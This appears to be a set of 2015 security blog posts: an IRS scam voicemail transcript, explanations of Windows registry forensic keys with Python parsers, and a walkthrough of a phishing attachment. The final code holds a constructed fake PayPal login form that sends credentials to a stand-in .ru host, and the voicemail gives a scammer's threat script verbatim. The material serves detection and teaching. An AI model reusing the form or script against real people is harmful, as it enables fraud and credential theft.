I received a voicemail about an IRS scam that was interesting enough that I thought I'd share it. I didn't answer, since I personally recommend never answering phone calls from non-local numbers, especially ones you weren't expecting and don't recognize. Let it go to voicemail, screen it, and then decide whether it's worth calling back. It was a threatening message claiming to be from the IRS, saying I'd been caught for tax evasion and would be arrested if I didn't call back. The IRS has posted consumer alerts about scams like this and offers several ways to report them; the quickest tell is that the IRS initiates contact by mail and does not threaten arrest over the phone. I have seen these before and can tell it's fake just from the accent and the demand to call now or get arrested. But some can be convincing, especially if you haven't received one before or aren't in tune with these types of scams. Enjoy and stay safe. Listen to the full audio of the voicemail. I posted the full transcript on pastebin.
*****
Source: +1 (202) 470-0933
Caller Id Location: DC, USA
Date: 10/27/2015
*****
FULL TRANSCRIPT
*****
We have received a legal position notice against you concerning a tax evasion. So before we file a case against you in the court house and before you get arrested kindly call us back on our callback number. The number to reach me that is 202-470-0933. I'll repeat, it's 2024700933. Don't disregard this message. Give it a call. Again this is officer Daniel Cruz from the Internal Revenue Service. Thank you and have a blessed day.
Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.
Thursday, October 29, 2015
IRS Phone Scam
Tuesday, October 27, 2015
Registry Explorer\ComDlg32 Key
If you've ever looked through a memory dump and noticed the following registry key getting modified, here's my take on what it's doing.
Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32
Each time a user opens or saves a file through the standard Windows Open/Save dialog, the dialog records it under this key. LastVisitedPidlMRU (and LastVisitedPidlMRULegacy for the older style of dialog) stores the executable that showed the dialog together with the folder the dialog was last pointed at, and OpenSavePidlMRU stores the files themselves, grouped by extension. Each of these holds numbered values plus an MRUListEx value that gives the order of use, most recent first.
For example, I opened this registry key
HKEY_USERS\C__Users_USERNAME_ntuser.dat\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedPidlMRULegacy\0
And was able to read the following values
notepad++.exe Windows\temp
Which indicates that the last folder notepad++.exe's Open/Save dialog was pointed at was c:\windows\temp, i.e. the user browsed that folder from within notepad++.exe. Note that this records the dialog's folder, not the file that was finally chosen; the file name shows up under OpenSavePidlMRU.
Registry Terminal Server Client\Servers Key
If you've ever looked through a memory dump and noticed the following registry key getting modified, here's my take on what it's doing.
Software\Microsoft\Terminal Server Client\Servers
Each time a user connects to another computer with Remote Desktop (mstsc.exe), a subkey named after the target host is created under Terminal Server Client\Servers, and its UsernameHint value stores the last username the client used for that host. The Default subkey next to it keeps an MRU list of the hosts most recently connected to. For example, I opened the following registry key
HKEY_USERS\C__Users_USERNAME_ntuser.dat\Software\Microsoft\Terminal Server Client\Servers\SERVERXYZ\UsernameHint
And was able to read the following values
DOMAIN1\USER1
Which indicates that the user last connected (or attempted to connect) to SERVERXYZ using the account DOMAIN1\USER1. The hint is written by the client, so it shows the credentials that were offered, not whether the logon succeeded; for that you need the logon events on SERVERXYZ.
Registry Explorer\RecentDocs Key
If you've ever looked through a memory dump and noticed the following registry key getting modified, here's my take on what it's doing.
Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs
Each time a file or folder is opened through the Windows shell (Explorer, the Open/Save dialogs, or the Start menu), its name is recorded under RecentDocs (which makes sense given the name). The key itself holds the overall list and there is a subkey per file extension, each with numbered values plus an MRUListEx value that gives the order of use, most recent first. Files a program opens directly, say from a command line, do not show up here. For example, I opened the following registry key
HKEY_USERS\C__Users_USERNAME_ntuser.dat\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.docx\3
And was able to read the following values
PracticeExam.docx, PracticeExam.docx.lnk
Which indicates that a Word document named PracticeExam.docx was recently opened. The second name is the shortcut Windows created for it in the user's Recent folder, which is worth pulling as well, since the .lnk file carries the target's full path and timestamps that the registry value does not.
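As an added example (not code from the original post), here is a small Python parser for the value layout that RecentDocs and the ComDlg32 LastVisitedPidlMRU key described earlier share: every numbered value starts with a null-terminated UTF-16LE name (the file name in RecentDocs, the executable name in LastVisitedPidlMRU) followed by binary shell-item data, and the sibling MRUListEx value lists the entry indices most-recent-first, terminated by 0xFFFFFFFF. The sample values are constructed here, and the trailing shell-item bytes are a placeholder, so the folder path inside a LastVisitedPidlMRU entry (which needs a shell item parser) is not recovered.

```python
import struct

MRU_TERMINATOR = 0xFFFFFFFF


def parse_mrulistex(data):
    """MRUListEx is a list of 4-byte little-endian indices, most recent first,
    terminated by 0xFFFFFFFF. Returns the indices in that order."""
    order = []
    usable = len(data) - len(data) % 4          # ignore a trailing partial dword
    for (idx,) in struct.iter_unpack("<I", data[:usable]):
        if idx == MRU_TERMINATOR:
            break
        order.append(idx)
    return order


def split_leading_utf16(data):
    """Split value data into (leading null-terminated UTF-16LE string, remainder).
    RecentDocs entries start with the file name; LastVisitedPidlMRU entries start
    with the executable name. Shell-item (PIDL) bytes follow the terminator."""
    end = 0
    while end + 1 < len(data):
        if data[end] == 0 and data[end + 1] == 0:   # UTF-16 NUL on a 2-byte boundary
            break
        end += 2
    name = data[:end].decode("utf-16-le", errors="replace")
    return name, data[end + 2:]


def mru_names(values):
    """values: {value_name: bytes} as read from one MRU key (e.g. RecentDocs\\.docx).
    Returns the leading names in most-recent-first order, skipping indices that
    have no matching value (common in partially overwritten keys)."""
    order = parse_mrulistex(values.get("MRUListEx", b""))
    names = []
    for idx in order:
        raw = values.get(str(idx))
        if raw is None:
            continue
        name, _pidl = split_leading_utf16(raw)
        names.append(name)
    return names


def _entry(name):
    """Build a constructed value: UTF-16LE name + NUL + placeholder shell-item bytes."""
    return name.encode("utf-16-le") + b"\x00\x00" + b"\x14\x00\x32\x00" + b"\x00" * 16


# Constructed sample for ...\Explorer\RecentDocs\.docx: entry 3 was used most recently.
SAMPLE_RECENTDOCS_DOCX = {
    "MRUListEx": struct.pack("<III", 3, 0, MRU_TERMINATOR),
    "0": _entry("Notes.docx"),
    "3": _entry("PracticeExam.docx"),
}

# Constructed sample for ...\Explorer\ComDlg32\LastVisitedPidlMRULegacy.
SAMPLE_LASTVISITED = {
    "MRUListEx": struct.pack("<III", 1, 0, MRU_TERMINATOR),
    "0": _entry("notepad.exe"),
    "1": _entry("notepad++.exe"),
}

if __name__ == "__main__":
    print("RecentDocs .docx, newest first:", mru_names(SAMPLE_RECENTDOCS_DOCX))
    print("LastVisitedPidlMRU, newest first:", mru_names(SAMPLE_LASTVISITED))
```

The numbered value names are only slots; the MRUListEx order is what tells you which entry was touched last, so always read it rather than assuming value 0 is the newest.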
Registry Shell\BagMRU Key
If you've ever looked through a memory dump and noticed the following registry key getting modified, here's my take on what it's doing.
Software\Microsoft\Windows\Shell\BagMRU
Each time a folder is browsed in Windows Explorer, the shell saves that folder's view settings (the "ShellBags") under BagMRU and Bags, so the tree of BagMRU subkeys is a record of folders the user opened, including folders on removable media or network shares and folders that have since been deleted. For example, I opened the following registry key
HKEY_USERS\C__Users_USERNAME_AppData_Local_Microsoft_Windows_UsrClass.dat\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\14
And was able to read the following values
login_scripts
Which indicates that a folder named login_scripts was browsed in Explorer. The numbered subkeys nest the same way the folders do, so walking up from 14 through its parent keys reconstructs the full path.
NirSoft has a nice utility called ShellBagsView that allows you to view these values.
Registry Explorer\UserAssist Key
If you've ever looked through a memory dump and noticed the following registry key getting modified, here's my take on what it's doing.
Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count\
Each time a program is launched through the shell (Explorer, the Start menu, the taskbar, or a shortcut), Windows updates an entry under this key with a run count and the date/time it was last executed. Value names are ROT13-encoded, which is why they look like random letters in a raw registry view, and the two {GUID} subkeys separate executables from shortcuts. For example, I opened the following registry key
HKEY_USERS\C__Users_USERNAME_ntuser.dat\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count\RANDOMLETTERS
And was able to read the following values (after decoding)
mstsc.exe , Microsoft.Windows.RemoteDesktop
Which indicates that Remote Desktop (mstsc.exe) was launched; the second entry is the same application's AppUserModelID, the name the taskbar and Start menu use for it.
In another example I saw this text
TaskBar\Google Chrome.lnk
Which indicates Chrome was launched from its pinned shortcut on the taskbar at the bottom of the screen.
Didier Stevens has a nice utility called UserAssist that allows you to view these values.
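As an added example (not from the original post, and not Didier Stevens' tool), the following Python decodes UserAssist value names with ROT13 and parses the binary Count data into a run count and last-execution time. The GUIDs are the well-known executable and shortcut subkeys; the value layout is the 72-byte Windows 7 and later format (run count at offset 4, FILETIME at offset 60) with a fallback for the 16-byte XP format. The sample values and their timestamps are constructed here.

```python
import codecs
import struct
from datetime import datetime, timedelta, timezone

# The two well-known UserAssist GUID subkeys on Windows 7 and later.
USERASSIST_GUIDS = {
    "{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}": "executable",
    "{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}": "shortcut",
}

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(ft):
    """FILETIME is 100-nanosecond ticks since 1601-01-01 UTC; 0 means 'never'."""
    if ft == 0:
        return None
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def datetime_to_filetime(dt):
    """Inverse of filetime_to_datetime (integer math, used to build the sample)."""
    td = dt - FILETIME_EPOCH
    micro = (td.days * 86400 + td.seconds) * 10**6 + td.microseconds
    return micro * 10


def decode_name(value_name):
    """Value names under UserAssist\\{GUID}\\Count are ROT13-encoded."""
    return codecs.decode(value_name, "rot_13")


def parse_count_data(data):
    """Parse the binary data of one Count value.
    Windows 7+ (72 bytes): 0 session id, 4 run count, 8 focus count,
    12 focus time in ms, 60 last-execution FILETIME.
    Windows XP (16 bytes): 0 session id, 4 run count, 8 FILETIME."""
    if len(data) >= 72:
        _session, run_count, focus_count, focus_ms = struct.unpack_from("<IIII", data, 0)
        (last_run,) = struct.unpack_from("<Q", data, 60)
    elif len(data) >= 16:
        _session, run_count = struct.unpack_from("<II", data, 0)
        focus_count = focus_ms = None
        (last_run,) = struct.unpack_from("<Q", data, 8)
    else:
        raise ValueError("UserAssist data too short: %d bytes" % len(data))
    return {"run_count": run_count, "focus_count": focus_count,
            "focus_time_ms": focus_ms, "last_run": filetime_to_datetime(last_run)}


def report(userassist):
    """userassist: {guid: {rot13_name: bytes}} for each {GUID}\\Count key.
    Returns decoded entries sorted by last execution, newest first."""
    rows = []
    for guid, count_values in userassist.items():
        for enc_name, data in count_values.items():
            row = {"name": decode_name(enc_name),
                   "kind": USERASSIST_GUIDS.get(guid, "unknown")}
            row.update(parse_count_data(data))
            rows.append(row)
    rows.sort(key=lambda r: r["last_run"] or FILETIME_EPOCH, reverse=True)
    return rows


def _win7_data(run_count, last_run):
    """Constructed 72-byte Windows 7 value; unknown fields left zeroed."""
    buf = bytearray(72)
    struct.pack_into("<IIII", buf, 0, 1, run_count, run_count, 1500 * run_count)
    struct.pack_into("<Q", buf, 60, datetime_to_filetime(last_run))
    return bytes(buf)


# Constructed sample: names stored ROT13-encoded exactly as the registry does.
_T1 = datetime(2015, 10, 27, 14, 5, 0, tzinfo=timezone.utc)
_T2 = datetime(2015, 10, 26, 9, 30, 0, tzinfo=timezone.utc)
SAMPLE_USERASSIST = {
    "{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}": {
        codecs.encode("mstsc.exe", "rot_13"): _win7_data(3, _T1),
        codecs.encode("Microsoft.Windows.RemoteDesktop", "rot_13"): _win7_data(3, _T1),
    },
    "{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}": {
        codecs.encode("TaskBar\\Google Chrome.lnk", "rot_13"): _win7_data(12, _T2),
    },
}

if __name__ == "__main__":
    for row in report(SAMPLE_USERASSIST):
        print(row["last_run"], row["kind"], row["run_count"], row["name"])
```

The run count and last-run time are what make this key useful in a timeline: a program that shows one execution at 03:00 on a workstation whose user works days is worth a closer look, whereas the ROT13 name alone only tells you it ran at some point.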
Monday, October 26, 2015
Walking Thru a Phishing Email Attachment
Here's a walk-thru of how I look at a Phishing Email Attachment.
There was a McAfee alert 'HTML/Phishing.b' on a file called 'form.html'. This most likely came from a user opening an attachment in an email.
Since McAfee marked it as infected and deleted it, the file was no longer in the original folder the alert had triggered on. But it was in the McAfee Quarantine folder as a .bup, so I was able to extract it. (A .bup is an OLE compound file whose streams, the Details metadata and the quarantined File_0, are XOR-encoded with 0x6A, so it can be decoded offline without restoring it through the console.)
The file that came back was this ugly JavaScript, obfuscated and hard to read. At a high level, the document contains one massively long Base64-encoded variable, which the JavaScript decodes and de-obfuscates into working HTML that the user's browser or email client then displays.
I know this because at the bottom I see the JavaScript call 'document.write', which writes raw HTML into the page. To be safe, I didn't want to run this JavaScript as-is, so I re-saved it with 'document.write' changed to 'console.log'. That lets me see the HTML without having the browser render it. Then I hit F12 to open the Firefox developer tools, reloaded the file, and saw the HTML printed in the Console tab. Note that the attacker's decoding code still executes in the browser with this approach; only the final write into the page is suppressed, so do it in a throwaway VM, or decode the Base64 blob offline without running any of the script.
After the JavaScript runs, the HTML displayed is this: an HTML form styled to look like PayPal, whose action posts the captured credentials to a .ru (Russian) website.
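As an added example (not the author's procedure, and not the real attachment), here is the offline version of the same triage in Python: pull every long Base64-looking string literal out of the JavaScript, decode it, and parse the resulting HTML for forms without ever executing the script. The sample JavaScript, the fake login form and the .ru host name are all constructed here; the analysis flags a form whose action host is not under the brand's own domain and reports which input names it collects.

```python
import base64
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed stand-in for the quarantined form.html: a fake login form whose
# action points at a made-up .ru host. This is NOT the real attachment.
_PHISH_HTML = (
    '<html><body><form method="POST" action="http://paypal-verify.example.ru/post.php">'
    '<input type="text" name="email"><input type="password" name="password">'
    '<input type="submit" value="Log In"></form></body></html>'
)
SAMPLE_JS = (
    'var _0xa1 = "' + base64.b64encode(_PHISH_HTML.encode()).decode() + '";\n'
    "function d(s) { return atob(s); }\n"
    "document.write(d(_0xa1));\n"
)


def extract_base64_payloads(js_text, min_len=40):
    """Find long Base64-looking string literals and decode them, without
    executing any of the JavaScript around them."""
    pattern = re.compile(r'["\']([A-Za-z0-9+/]{%d,}={0,2})["\']' % min_len)
    payloads = []
    for match in pattern.finditer(js_text):
        try:
            payloads.append(base64.b64decode(match.group(1), validate=True))
        except ValueError:      # not valid Base64 (binascii.Error subclasses ValueError)
            continue
    return payloads


class _FormCollector(HTMLParser):
    """Collect each <form>'s action/method and the names of its <input>s."""

    def __init__(self):
        super().__init__()
        self.forms = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.forms.append({"action": a.get("action") or "",
                               "method": (a.get("method") or "GET").upper(),
                               "inputs": []})
        elif tag == "input" and self.forms and a.get("name"):
            self.forms[-1]["inputs"].append(a["name"])


def analyze(js_text, expected_domain="paypal.com"):
    """Decode the embedded payload(s) and report where each form posts.
    A form is suspicious when its action host is not the brand's own domain;
    collects_password says whether it also asks for a password."""
    findings = []
    for payload in extract_base64_payloads(js_text):
        parser = _FormCollector()
        parser.feed(payload.decode("utf-8", errors="replace"))
        for form in parser.forms:
            host = (urlsplit(form["action"]).hostname or "").lower()
            off_brand = not (host == expected_domain or host.endswith("." + expected_domain))
            findings.append({
                "host": host,
                "method": form["method"],
                "inputs": form["inputs"],
                "collects_password": any("pass" in n.lower() for n in form["inputs"]),
                "suspicious": off_brand,
            })
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_JS):
        print(finding)
```

Real samples often chain several decoding steps (Base64 inside URL-encoding, string reversal, and so on), so if the first decode yields more JavaScript rather than HTML, feed it back through the extractor until a form appears or the chain needs an actual interpreter, at which point a sandboxed VM is the right tool.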